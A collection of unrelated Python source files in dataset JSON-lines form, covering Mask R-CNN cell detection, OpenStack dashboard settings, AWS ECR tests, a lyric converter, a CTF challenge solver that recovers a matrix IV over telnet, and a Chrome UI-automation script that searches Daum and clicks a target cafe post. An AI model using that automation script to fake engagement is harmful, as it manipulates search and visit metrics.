runtime = time.time() - img_start\n time_n += runtime\n print(f\"\\tDetection time: {runtime}\")\n\n # Display the results\n if do_display:\n image = skimage.io.imread(re.sub(r\"/DatasetGeneChannels/\", \"/DatasetRGBChannels/\", image_path))\n colours = []\n for _ in r['class_ids']:\n colours.append((0., .5, 1.))\n viz.display_instances(image, boxes=r[\"rois\"], masks=r[\"masks\"], class_ids=r[\"class_ids\"],\n class_names=[\"background\", \"\"], colors=colours, figsize=(2048, 2048), show_bbox=False)\n\n print(f\"\\n\\n----Final report----\")\n print(f\"\\tTotal nuclei detected: {tot_n}\")\n print(f\"\\tAverage accuracy: {acc_n / len(targets)}\")\n print(f\"\\tAverage detection time: {time_n / len(targets)}\")\n\n\n############################################################\n# Main\n############################################################\nif __name__ == '__main__':\n import argparse\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(\n description='Train Mask R-CNN to detect cell nucleus in an image.')\n parser.add_argument(\"command\",\n metavar=\"\",\n help=\"'train' or 'test'\")\n parser.add_argument('--dataset', required=False,\n metavar=\"/path/to/cell/dataset/\",\n help='Directory of the Cell dataset for training.')\n parser.add_argument('--weights', required=True,\n metavar=\"/path/to/weights.h5\",\n help=\"Path to weights .h5 file or 'coco'.\")\n parser.add_argument('--logs', required=False,\n default=DEFAULT_LOGS_DIR,\n metavar=\"/path/to/logs/\",\n help='Logs and checkpoints directory (default=logs/).')\n parser.add_argument('--image', required=False,\n metavar=\"path or URL to image\",\n help='Image on which you detect nuclei.')\n parser.add_argument('--dir', required=False,\n metavar=\"path or URL to image\",\n help='Directory containing images on which you detect nuclei.')\n parser.add_argument('--channel_number', required=False,\n default=3, type=int,\n metavar=\"Number of channels in the input images\",\n help=\"Specifies the number of channels in the image.\")\n parser.add_argument('--display_image', required=False,\n default=False, type=bool,\n metavar=\"\",\n help=\"Specifies whether the results of the testing are visualized with an image.\")\n parser.add_argument('--epochs', required=False,\n default=10, type=int,\n metavar=\"\",\n help=\"Number of epochs for training the model.\")\n args = parser.parse_args()\n\n # Validate arguments\n if args.command == \"train\":\n assert args.dataset, \"Argument --dataset is required for training\"\n elif args.command == \"test\":\n assert args.image or args.dir, \"Provide --image or --video to apply color splash\"\n\n # Load the configuration\n if args.command == \"train\":\n config = CellConfigNuclei()\n else:\n class InferenceConfig(CellConfigNuclei):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n\n config = InferenceConfig()\n config.display()\n\n # Create model\n if args.command == \"train\":\n model = modellib.MaskRCNN(mode=\"training\", config=config,\n model_dir=args.logs)\n else:\n model = modellib.MaskRCNN(mode=\"inference\", config=config,\n model_dir=args.logs)\n\n # Select weights file to load\n if args.weights.lower() == \"coco\":\n weights_path = COCO_WEIGHTS_PATH\n # Download weights file\n if not os.path.exists(weights_path):\n utils.download_trained_weights(weights_path)\n elif args.weights.lower() == \"last\":\n # Find last trained weights\n weights_path = model.find_last()\n else:\n weights_path = args.weights\n\n # Load weights\n print(\"Loading weights \", weights_path)\n if args.weights.lower() == \"coco\":\n # Exclude the last layers because they require a matching\n # number of classes\n model.load_weights(weights_path, by_name=True, exclude=[\n \"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n \"mrcnn_bbox\", \"mrcnn_mask\"])\n else:\n model.load_weights(weights_path, by_name=True)\n\n # Train or test\n if args.command == \"train\":\n train(model=model, dataset=args.dataset, config=config, epochs=args.epochs)\n elif args.command == \"test\":\n # Load the image and corresponding ground truths\n if args.image:\n # Load the annotation file\n dir = os.path.split(args.image)[0]\n print(f\"\\tLoading images from the folder {dir}\")\n a = json.load(open(os.path.join(dir, \"via_mask_annotations_json.json\")))\n a = list(a.values())\n\n targets = []\n for file in a:\n if a[\"filename\"] != os.path.split(args.image)[1]:\n continue\n n = len(file[\"regions\"])\n targets.append(n)\n images = [args.image]\n else:\n # Load the annotation file\n dir = args.dir\n print(f\"\\tLoading images from the folder {dir}\")\n a = json.load(open(os.path.join(dir, \"via_mask_annotations_json.json\")))\n a = list(a.values())\n\n # Load the image names\n images = [os.path.join(dir, x[\"filename\"]) for x in a if x[\"regions\"]]\n print(f\"\\tImages found: \")\n print(\"\\n\".join([os.path.split(x)[1] for x in images]))\n\n targets = []\n for file in a:\n n = len(file[\"regions\"])\n targets.append(n)\n\n test(model=model, images_path=images, targets=targets, do_display=args.display_image)\n","sub_path":"cell/CellQuadrantDetection.py","file_name":"CellQuadrantDetection.py","file_ext":"py","file_size_in_byte":17467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"25423337","text":"import os\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nPROD = False\nUSE_SSL = False\n\nLOCAL_PATH = os.path.dirname(os.path.abspath(__file__))\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': '/var/lib/openstack-dashboard/dashboard_openstack.sqlite3',\n 'TEST_NAME': os.path.join(LOCAL_PATH, 'test.sqlite3'),\n },\n}\n\n# We recommend you use memcached for development; otherwise after every reload\n# of the django development server, you will have to login again. To use\n# memcached set CACHE_BACKED to something like 'memcached://127.0.0.1:11211/' \n#CACHE_BACKEND = 'locmem://'\nCACHE_BACKEND = 'memcached://127.0.0.1:11211/'\n\n# Send email to the console by default\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n# Or send them to /dev/null\n#EMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\n# Configure these for your outgoing email host\n# EMAIL_HOST = 'smtp.my-company.com'\n# EMAIL_PORT = 25\n# EMAIL_HOST_USER = 'djangomail'\n# EMAIL_HOST_PASSWORD = 'top-secret!'\n\nHORIZON_CONFIG = {\n 'dashboards': ('nova', 'syspanel', 'settings',),\n 'default_dashboard': 'nova',\n 'user_home': 'dashboard.views.user_home',\n}\n\nOPENSTACK_HOST = \"127.0.0.1\"\nOPENSTACK_KEYSTONE_URL = \"http://%s:5000/v2.0\" % OPENSTACK_HOST\n# FIXME: this is only needed until keystone fixes its GET /tenants call\n# so that it doesn't return everything for admins\nOPENSTACK_KEYSTONE_ADMIN_URL = \"http://%s:35357/v2.0\" % OPENSTACK_HOST\nOPENSTACK_KEYSTONE_DEFAULT_ROLE = \"Member\"\n\n# The number of Swift containers and objects to display on a single page before\n# providing a paging element (a \"more\" link) to paginate results.\nSWIFT_PAGINATE_LIMIT = 1000\n\n# Configure quantum connection details for networking\nQUANTUM_ENABLED = False\nQUANTUM_URL = '%s' % OPENSTACK_HOST\nQUANTUM_PORT = '9696'\nQUANTUM_TENANT = '1234'\nQUANTUM_CLIENT_VERSION='0.1'\n\n# If you have external monitoring links, eg:\n# EXTERNAL_MONITORING = [\n# ['Nagios','http://foo.com'],\n# ['Ganglia','http://bar.com'],\n# ]\n\nLOGGING = {\n 'version': 1,\n # When set to True this will disable all logging except\n # for loggers specified in this configuration dictionary. Note that\n # if nothing is specified here and disable_existing_loggers is True,\n # django.db.backends will still log unless it is disabled explicitly.\n 'disable_existing_loggers': False,\n 'handlers': {\n 'null': {\n 'level': 'DEBUG',\n 'class': 'django.utils.log.NullHandler',\n },\n 'console': {\n # Set the level to \"DEBUG\" for verbose output logging.\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n },\n 'log_file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': '/var/log/openstack-dashboard/openstack_dashboard.log',\n },\n },\n 'loggers': {\n # Logging from django.db.backends is VERY verbose, send to null\n # by default.\n 'django.db.backends': {\n 'handlers': ['null'],\n 'propagate': False,\n },\n 'horizon': {\n 'handlers': ['log_file'],\n 'propagate': False,\n },\n 'novaclient': {\n 'handlers': ['log_file'],\n 'propagate': False,\n },\n 'keystoneclient': {\n 'handlers': ['log_file'],\n 'propagate': False,\n },\n 'nose.plugins.manager': {\n 'handlers': ['log_file'],\n 'propagate': False,\n }\n }\n}\n\nLOGIN_URL = '/dashboard/auth/login'\n","sub_path":"redhat/local_settings.py","file_name":"local_settings.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"389399319","text":"import pandas as pd\nimport numpy as numpy\nimport sqlite3\n \nconn = sqlite3.connect(r'C:\\temp\\loc_post.db')\ncursor = conn.cursor()\n\nPDB = cursor.execute(\"SELECT * FROM position where nearestBranch is null\" )\n\nrows = cursor.fetchall()\nfor row in rows:\n print(row)\n\nconn.commit()\nconn.close()","sub_path":"Study_9th_Calulation_distance/4.dbQuery.py","file_name":"4.dbQuery.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"331316442","text":"import sys\nfilepath = '/input/records.json' \n# order = {}\n# line_item = {}\n# def create(check, key, temp):\n# print(check)\n# if(check == '\"order\"'):\n# # print(\"true\")\n# order[key] = [_ for _ in temp]\n# else:\n# # print(\"false\")\n# if(key in line_item):\n# line_item[key].append([_ for _ in temp])\n# else:\n# line_item[key] = [_ for _ in temp]\n\n\n\nwith open(filepath) as fp: \n line = fp.readline()\n while line:\n line = line[1:-2]\n temp = line.split(\", \")\n # print(temp[0].strip())\n check = temp[0].strip()\n key = temp[1].strip()\n print(check+\"+\", temp)\n line = fp.readline()\n\n\n\n\n\n\n # cnt = 1\n # while line:\n # # print(\"Line {}: {}\".format(cnt, line.strip()))\n # line = fp.readline()\n # cnt += 1","sub_path":"Module 7/Assignment 1/mapper2.py","file_name":"mapper2.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"87773957","text":"from util.sql_source import SqlSource\nfrom util.solr_source import SolrSource\nfrom datetime import datetime\nfrom nltk.corpus import stopwords\n\nclass Reviews(SqlSource, SolrSource):\n\n def __init__(self, sql_connection_str, solr_server, random_seed):\n SqlSource.__init__(self, sql_connection_str, random_seed)\n SolrSource.__init__(self, solr_server)\n\n def termsByAsin(self, asin):\n return self._execSolrQuery(\n 'asin:\"{}\"'.format(asin),\n **{\n 'facet':'true',\n 'facet.field':'reviewText'\n })\n\n\n\n def asinByTerms(self, terms):\n return self._execSolrQuery(\n 'reviewText:\"{}\"'.format(terms),\n **{\n 'facet': 'true',\n 'facet.field': 'asin'\n })","sub_path":"data_exploration/api/reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"390659667","text":"from unittest import TestCase\n\nfrom mock import patch, MagicMock\n\nfrom aws_boto3 import ecr\n\n\nclass AwsBoto3EcrTest(TestCase):\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr', return_value=False)\n def test_ecr_ensure_repo(self, get_repo_mock, client_mock):\n client_mock.return_value = MagicMock()\n client_mock.return_value.create_repository = MagicMock()\n client_mock.return_value.create_repository.return_value = {'repository': {'repositoryArn': 'newrepo'}}\n response = ecr.ecr_ensure_repo('foo')\n self.assertEquals(response, {'repositoryArn': 'newrepo'})\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr', return_value='12345')\n def test_ecr_ensure_repo_exists(self, get_repo_mock, client_mock):\n response = ecr.ecr_ensure_repo('foo')\n self.assertEquals(response, {'repositoryArn': '12345'})\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr')\n def test_ecr_absent_repo(self, get_repo_mock, client_mock):\n client_mock.return_value = MagicMock()\n client_mock.return_value.delete_repository = MagicMock()\n client_mock.return_value.delete_repository.return_value = True\n response = ecr.ecr_absent_repo('foo')\n self.assertEquals(response, {'RepositoryAbsent': 'foo'})\n\n @patch('aws_boto3.ecr.get_client')\n @patch('aws_boto3.ecr.get_repo_attr', return_value=False)\n def test_ecr_absent_repo_not_exists(self, get_repo_mock, client_mock):\n client_mock.return_value = MagicMock()\n client_mock.return_value.delete_repository = MagicMock()\n response = ecr.ecr_absent_repo('deleted')\n self.assertEquals(response, {'RepositoryAbsent': 'deleted'})\n","sub_path":"tests/test_ecr.py","file_name":"test_ecr.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610763173","text":"import os\nimport pickle\nScoreDraftPath= os.path.dirname(__file__)\n\nlyricSet=set()\nlyricPrefixSet=set()\nvowelSet={'a','e','i','o','u','E','9','3','@','A','I','O','8','Q','6','x','&','1','0'}\nvowelPrefixSet=set()\n\natomicSet={'ch','dh','sh','th','zh','ng','Ang','dr','tr'}\n\ndef BuildLyricSet():\n\twith open(ScoreDraftPath+'/UTAUVoice/Yami/D4/oto.ini', 'r') as f:\n\t\twhile True:\n\t\t\tline = f.readline()\n\t\t\tif not line:\n\t\t\t\tbreak\n\t\t\tp1 = line.find('=')\n\t\t\tif p1==-1:\n\t\t\t\tcontinue\n\t\t\tfn=line[0:p1-4]\n\t\t\tp2 = line.find(',',p1)\n\t\t\tif p2==-1:\n\t\t\t\tcontinue\n\t\t\tlyric=line[p1+1:p2]\n\t\t\tif lyric=='':\n\t\t\t\tlyric=fn\n\t\t\tlyricSet.add(lyric)\n\twith open(ScoreDraftPath+'/VCCVLyricSet.data','wb') as f:\n\t\tpickle.dump(lyricSet,f)\n\ndef LoadLyricSet():\n\twith open(ScoreDraftPath+'/VCCVLyricSet.data','rb') as f:\n\t\tglobal lyricSet\n\t\tlyricSet=pickle.load(f)\n\n#BuildLyricSet()\nLoadLyricSet()\n\nfor lyric in lyricSet:\n\tfor i in range(len(lyric)):\n\t\tif lyric[i]==' ':\n\t\t\tcontinue\n\t\tlyricPrefixSet.add(lyric[0:i+1])\n\nfor vowel in vowelSet:\n\tfor i in range(len(vowel)):\n\t\tvowelPrefixSet.add(vowel[0:i+1])\n\ndef VCCVEnglishConverter(inList):\n\tinList_a=[]\n\tfor inLyric in inList:\n\t\tlyric_a=[]\n\t\ti=0\n\t\twhile i0:\n\t\t\tif prefix=='-' or cur[1]>0 or vowelMap[cur[0]][0]==0:\n\t\t\t\ttest_seg = prefix + inList_a[cur[0]][cur[1]]\n\t\t\t\tif test_seg in lyricPrefixSet:\n\t\t\t\t\tbreak\n\n\t\t\ttest_seg = prefix +' '+inList_a[cur[0]][cur[1]]\n\t\t\tif test_seg in lyricPrefixSet:\n\t\t\t\tbreak\n\n\t\t\tprefix=prefix[1:len(prefix)]\n\n\t\t#pass2\n\t\tnextStart=cur[:]\n\t\tseg=''\n\t\tisVowel=False\n\n\t\twhile True:\n\t\t\tseg=''\n\t\t\tlastSeg=prefix[:]\n\t\t\tcur2=cur[:] \n\n\t\t\tisVowel=False\n\n\t\t\twhile True:\n\t\t\t\tspaceMust=False\n\t\t\t\tnewChar=''\n\t\t\t\tif not (cur2[0]0:\n\t\t\t\t\t\tspaceMust=True\n\n\t\t\t\tif lastSeg=='' and cur[0]=vowelMap[cur[0]][0] and cur[1]=vowelMap[cur[0]][0] and cur[1]=len(inList_a[cur2[0]]):\n\t\t\t\t\tcur2[0]+=1\n\t\t\t\t\tcur2[1]=0\t\n\t\t\t\t\tif seg!='':\n\t\t\t\t\t\tbreak\t\t\t\n\n\n\t\t\tif len(seg)>0 or len(prefix)==0:\n\t\t\t\tbreak\n\t\t\t\n\t\t\tprefix=prefix[1:len(prefix)]\t\n\n\t\tif len(seg)>0:\n\t\t\toutList+=[(seg, iIn, isVowel)]\n\n\t\tif not (cur[0]=len(inList_a[cur[0]]):\n\t\t\tcur[0]+=1\n\t\t\tcur[1]=0\n\n\t\tpos=nextStart[:]\n\t\tprefix=''\n\t\twhile pos[0]=len(inList_a[pos[0]]):\n\t\t\t\tpos[0]+=1\n\t\t\t\tpos[1]=0\n\n\tret=[]\n\tsyllable=()\n\tiSyllable=0\n\n\tfor i in range(len(outList)):\n\t\toutItem=outList[i]\n\t\tif outItem[1]!=iSyllable:\n\t\t\tret+=[syllable]\n\t\t\tsyllable=()\n\t\t\tiSyllable=outItem[1]\n\t\tweight=0.1\n\t\tif outItem[2]:\n\t\t\tweight=0.4\n\t\tsyllable+=(outItem[0], weight, outItem[2])\n\n\tret+=[syllable]\n\n\t#print(ret)\n\n\treturn ret\n","sub_path":"ScoreDraft/VCCVEnglishConverter.py","file_name":"VCCVEnglishConverter.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"308277305","text":"\ndef is_inside(point, rec):\n if rec[0] < point[0] < rec[0] + rec[2] and rec[1] < point[1] < rec[1] + rec[3]:\n return True\n else:\n return False\n\n# Test: If the starting point is inside the rectangle and the return value is True,\n# or the starting point is outside the rectangle and the return value is False,\n# the function will be correct.\n\n#Otherwise, the function has a bug\n\nfrom turtle import*\n\nlist1 = [200, 120]\nlist2 = [210, -60, 100, 200]\nprint(is_inside(list1, list2))\n\nshape()\npenup()\ngoto(list1)\npendown()\n\ngoto(list2[:2])\ngoto(list2[0] + list2[2], list2[1])\ngoto(list2[0] + list2[2], list2[1] + list2[3])\ngoto(list2[0], list2[1] + list2[3])\ngoto(list2[:2])\n\nmainloop()\n","sub_path":"session5/exercise_11_12.py","file_name":"exercise_11_12.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"526911822","text":"import telnetlib\n\ndef connect(host, ip):\n return telnetlib.Telnet(host, ip)\n\ndef readline(tel):\n return tel.read_until(b'\\n').decode('utf8')\n\ndef pad(s):\n if len(s)%9 == 0:\n return s\n for i in range((9-(len(s)%9))):\n s.append(0)\n return s\n\ndef decode(seed, res):\n IV = []\n seed = pad(seed)\n print(seed)\n for i in range(9):\n if (len(seed) // 9) % 2 == 1:\n x = res[i//3][i%3]\n else:\n x = res[i%3][i//3]\n for j in range(len(seed)//9):\n if (i != 0) and (i != 8):\n print(i)\n if j % 2 == 0:\n x ^= seed[i + j*9]\n else:\n if (i%2) == 0:\n x ^= seed[(8-i) + j*9]\n else:\n if i == 1:\n x ^= seed[3 +j*9]\n elif i == 3:\n x ^= seed[1 +j*9]\n elif i == 5:\n x ^= seed[7 +j*9]\n elif i == 7:\n x ^= seed[5 +j*9]\n else:\n x ^= seed[i + j*9]\n\n IV.append(x)\n\n return IV[::3]+IV[1::3]+IV[2::3]\ndef main():\n connection = connect('vermatrix.pwn.democrat', '4201')\n line = readline(connection)\n seed = line.split(': ')[1][:-1]\n print(seed)\n res = []\n line = readline(connection)\n res.append([int(x) for x in line.strip().split(' ')])\n print(line)\n line = readline(connection)\n res.append([int(x) for x in line.strip().split(' ')])\n print(line)\n line = readline(connection)\n res.append([int(x) for x in line.strip().split(' ')])\n print(line)\n print(res)\n IV = decode([ord(c) for c in seed], res)\n connection.write((','.join([str(x) for x in IV])).encode('utf8'))\n print(readline(connection))\n \nif __name__ == '__main__':\n main()\n \n","sub_path":"VermatrixSupreme/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"27261384","text":"'''\n KC_EJ23\n Crea un programa que reciba los nombres y las calificaciones de N personas, mientras que le usuario no escriba \"terminar\".\n Al terminar debera mostrar la media de calificaciones de cada persona.\n'''\n \n_FIN = \"terminar\"\n\n \n# Función que se encarga de solicitar el dato al usuario mientras no introduzca un valor válido. La primera vez no permite \"terminar\". \ndef pide_nombre(msg, i):\n nombre = None\n\n while nombre is None:\n nombre = input(msg)\n\n if nombre == _FIN and i == 0:\n nombre = None\n print(\"\\n\\tNombre no válido.\\n\")\n else:\n if len(nombre) != 0 and len(nombre) > 2 and nombre.isalnum():\n return nombre\n else:\n nombre = None\n print(\"\\n\\tNombre no válido.\\n\")\n\n# Función que se encarga de solicitar el dato al usuario mientras no introduzca un valor válido\ndef pide_nota(msg):\n nota_pedida = None\n\n while nota_pedida is None:\n nota_pedida = valida_nota(input(msg))\n\n if nota_pedida is None:\n print(\"\\n\\tNota no válida. Se solicita un valor numérico entre 0 y 10.\\n\")\n\n return nota_pedida\n\n\n# Función que se encarga de validar que el valor que le llega es numérico entre 0 y 10, o devolverá 'None'\ndef valida_nota(str_nota):\n try:\n nota_valida = float(str_nota)\n\n if nota_valida < 0 or nota_valida > 10:\n nota_valida = None\n except:\n nota_valida = None\n\n return nota_valida\n\n\n# Ejecución del código principal\nif __name__ == \"__main__\":\n\n lista_alumnos = []\n \n fin = False\n i = 0\n\n while not fin:\n \n dic_alumno = {\"Nombre\": \"\", \"Matemáticas\": 0.0, \"Física\": 0.0, \"Química\": 0.0}\n\n for key in dic_alumno.keys():\n if key == \"Nombre\":\n \n if i > 0:\n print(\"\\nPara dejar de introducir alumnos, escribe: 'terminar'.\")\n \n dic_alumno[key] = pide_nombre(\"Introduce el nombre del alumno: \", i)\n \n if dic_alumno[\"Nombre\"] == _FIN:\n print(\"\")\n break\n else:\n dic_alumno[key] = pide_nota(\"Introduce su nota de {}: \".format(key))\n \n if dic_alumno[\"Nombre\"] != _FIN:\n lista_alumnos.append(dic_alumno)\n else:\n fin = True\n \n i += 1\n\n for n in range(0, len(lista_alumnos)):\n suma = 0\n \n for key in lista_alumnos[n].keys():\n if key != \"Nombre\":\n suma += lista_alumnos[n][key]\n \n print(\"{}:\\t\\t{}\".format(lista_alumnos[n][\"Nombre\"], round(suma / 3, 2)))\n","sub_path":"KC_EJ23.py","file_name":"KC_EJ23.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"47691926","text":"import traceback\nimport uiautomation as auto\nfrom datetime import datetime\nimport time\nimport logging\n\nlogger = logging.getLogger(__file__)\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s %(levelname)-.1s %(lineno)4s:%(funcName)20s %(message)s')\nhandler = logging.StreamHandler()\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\n\ndef chrome_daum_cafe(keyword, url, target):\n start_fun = datetime.now()\n result = False\n\n try:\n logger.info(\"=\" * 80)\n logger.info(f\"keyword: {keyword} / target: {target}\")\n logger.info(\"=\" * 80)\n\n logger.info(f\"[1/6] 크롬 브라우저 검색\")\n browser = auto.PaneControl(ClassName=\"Chrome_WidgetWin_1\")\n if browser.Exists(5, 1):\n browser.SetActive()\n else:\n return False\n\n logger.info(f\"[2/6] 글꼴 크기 100%로 변경\")\n auto.SendKeys(\"{Ctrl}0\")\n\n logger.info(f\"[3/6] URL 입력 박스에 URL 입력\")\n control = browser.EditControl(Name=\"주소창 및 검색창\")\n if control.Exists(5, 1):\n control.Click()\n control.SendKeys(\"https://search.daum.net/search?w=cafe&nil_search=btn&DA=NTB&enc=utf8&ASearchType=1&lpp=10&rlang=0&q=\")\n control.SendKeys(\"{Enter}\")\n else:\n return False\n\n logger.info(f\"[4/6] 페이지 로드 확인\")\n while browser.Name != \"– Daum 검색 - Chrome\":\n time.sleep(0.1)\n\n browser = auto.PaneControl(Name=\"– Daum 검색 - Chrome\")\n if browser.Exists(20, 1):\n pass\n else:\n return False\n\n time.sleep(1)\n\n logger.info(f\"[5/6] 검색 키워드 입력\")\n control = browser.EditControl(Name=\"검색어 입력\")\n if control.Exists(5, 1):\n while control.BoundingRectangle.width() == 0 and control.BoundingRectangle.height() == 0:\n logger.info(f'클릭 가능할때까지 1초 대기')\n time.sleep(1)\n control.Click()\n control.SendKeys(keyword, interval=0.1)\n control.SendKeys(\"{Enter}\")\n else:\n return False\n\n logger.info(f\"[6/6] 검색 결과 페이지에서 제목 검색\")\n browser = auto.PaneControl(Name=f\"{keyword} – Daum 검색 - Chrome\")\n for page_no in range(1, 10 + 1):\n\n logger.info(f' - {page_no} 페이지 검색')\n if page_no == 1:\n pass\n else:\n control = browser.HyperlinkControl(Name=f\"{page_no}\")\n if control.Exists(5, 1):\n auto.SendKey(auto.Keys.VK_END)\n control.Click()\n else:\n return False\n\n control = browser.HyperlinkControl(SubName=target)\n\n if control.Exists(2, 0.5):\n\n if control.BoundingRectangle.width() == 0 and control.BoundingRectangle.height() == 0:\n auto.SendKey(auto.Keys.VK_PAGEDOWN)\n else:\n auto.SendKey(auto.Keys.VK_DOWN)\n\n control.Click()\n time.sleep(1)\n\n tab = auto.EditControl(SubName=target)\n if tab.Exists(10, 1):\n\n time.sleep(1)\n tab.SendKeys(\"{Tab}\")\n time.sleep(3)\n\n for no in range(1, 8):\n auto.SendKey(auto.Keys.VK_PAGEDOWN)\n logger.info(f\"[{no}/{7}] PAGEDOWN 키 누름\")\n time.sleep(0.5)\n\n result = True\n break\n else:\n break\n\n except Exception as e:\n logger.error(f\"{traceback.format_exc()}\")\n\n finally:\n logger.info(f\"소요시간 {(datetime.now() - start_fun).total_seconds():.3f}\")\n\n return result\n\n\nif __name__ == '__main__':\n chrome_daum_cafe('로또블루', 'https://cafe.daum.net/iloveHAMSTER/XyL/1699', '로또뽀또복궈니의 친구정리!!!+친신 받아요^^')\n","sub_path":"daum_cafe.py","file_name":"daum_cafe.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"300171866","text":"#################################################################################\n# WaterTAP Copyright (c) 2020-2023, The Regents of the University of California,\n# through Lawrence Berkeley National Laboratory, Oak Ridge National Laboratory,\n# National Renewable Energy Laboratory, and National Energy Technology\n# Laboratory (subject to receipt of any required approvals from the U.S. Dept.\n# of Energy). All rights reserved.\n#\n# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license\n# information, respectively. These files are also available online at the URL\n# \"https://github.com/watertap-org/watertap/\"\n#################################################################################\n\"\"\"\nThis module contains the base class for interacting with WaterTAP data files\nwith zero-order model parameter data.\n\"\"\"\nimport os\nimport yaml\nfrom copy import deepcopy\n\n\nclass Database:\n \"\"\"\n WaterTap Database class.\n\n Used to instantiate an instance of a database for loading parameters\n associated with zero-order models in WaterTap.\n\n Args:\n dbpath - (optional) path to database folder containing yaml files\n\n Returns:\n an instance of a Database object linked to the provided database\n \"\"\"\n\n def __init__(self, dbpath=None):\n self._cached_files = {}\n\n if dbpath is None:\n self._dbpath = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"..\",\n \"data\",\n \"techno_economic\",\n )\n else:\n self._dbpath = dbpath\n\n # Confirm valid path\n if not os.path.isdir(self._dbpath):\n raise OSError(\n f\"Could not find requested path {self._dbpath}. Please \"\n f\"check that this path exists.\"\n )\n\n # Create placeholder _component_list attribute\n self._component_list = None\n\n def get_source_data(self, water_source=None):\n \"\"\"\n Method to retrieve water source definition from database.\n\n Args:\n water_source - (optional) string indicating specific water source.\n If None, the default water source will be used.\n\n Returns:\n dict of parameters defined in database for given water source\n\n Raises:\n KeyError if database has not defined water sources\n \"\"\"\n if \"water_sources\" in self._cached_files:\n # If data is already in cached files use this\n source_data = self._cached_files[\"water_sources\"]\n else:\n # Else load data from required file\n try:\n with open(os.path.join(self._dbpath, \"water_sources.yaml\"), \"r\") as f:\n lines = f.read()\n f.close()\n except OSError:\n raise KeyError(\"Could not find water_sources.yaml in database.\")\n\n source_data = yaml.load(lines, yaml.Loader)\n\n # Store data in cache and return\n self._cached_files[\"water_sources\"] = source_data\n\n # Check that water source is defined\n if water_source is None:\n try:\n water_source = source_data[\"default\"]\n except KeyError:\n raise KeyError(\n \"Database has not defined a default water source and \"\n \"none was provided.\"\n )\n\n return source_data[water_source]\n\n def get_solute_set(self, water_source=None):\n \"\"\"\n Method to retrieve solute set for a given water source.\n\n Args:\n water_source - (optional) string indicating specific water source.\n If None, the default water source will be used.\n\n Returns:\n list of solutes contained in the database for the given source.\n\n Raises:\n KeyError if water source could not be found in database\n \"\"\"\n source_data = self.get_source_data(water_source)\n\n # Get component set for water source\n comp_set = list(source_data[\"solutes\"].keys())\n\n return comp_set\n\n def get_unit_operation_parameters(self, technology, subtype=None):\n \"\"\"\n Method to retrieve parameters for a given technology by subtype.\n\n Args:\n technology - unit operation technology to look up and retrieve\n parameters for.\n subtype - (optional) string or list-of-strings indicating specific\n sub-type of technology to return parameters for. If not\n provided, the default parameters are used instead.\n\n Returns:\n dict of parameters for technology and subtype\n\n Raises:\n KeyError if technology or subtype could not be found in database\n TypeError if subytpe is not string or list-of-strings\n \"\"\"\n params = self._get_technology(technology)\n\n # Get default parameter set\n sparams = deepcopy(params[\"default\"])\n\n if subtype is None:\n # Return default values\n pass\n elif isinstance(subtype, str):\n try:\n sparams.update(params[subtype])\n except KeyError:\n raise KeyError(\n f\"Received unrecognised subtype {subtype} for technology \"\n f\"{technology}.\"\n )\n else:\n # Assume subtype is list-like and raise an exception if not\n try:\n for s in subtype:\n # Iterate through provided subtypes and update parameters\n # Note that this will overwrite previous parameters if\n # there is overlap, so we might need to be careful in use.\n try:\n sparams.update(deepcopy(params[s]))\n except KeyError:\n raise KeyError(\n f\"Received unrecognised subtype {s} for \"\n f\"technology {technology}.\"\n )\n except TypeError:\n raise TypeError(\n f\"Unexpected type for subtype {subtype}: must be string \"\n f\"or list like.\"\n )\n\n return sparams\n\n def flush_cache(self):\n \"\"\"\n Method to flush cached files in database object.\n \"\"\"\n self._cached_files = {}\n\n @property\n def component_list(self):\n return self._return_component_list()\n\n def _return_component_list(self):\n if self._component_list is None:\n self._load_component_list()\n return self._component_list\n\n def _get_technology(self, technology):\n if technology in self._cached_files:\n # If data is already in cached files, return\n return self._cached_files[technology]\n else:\n # Else load data from required file\n try:\n with 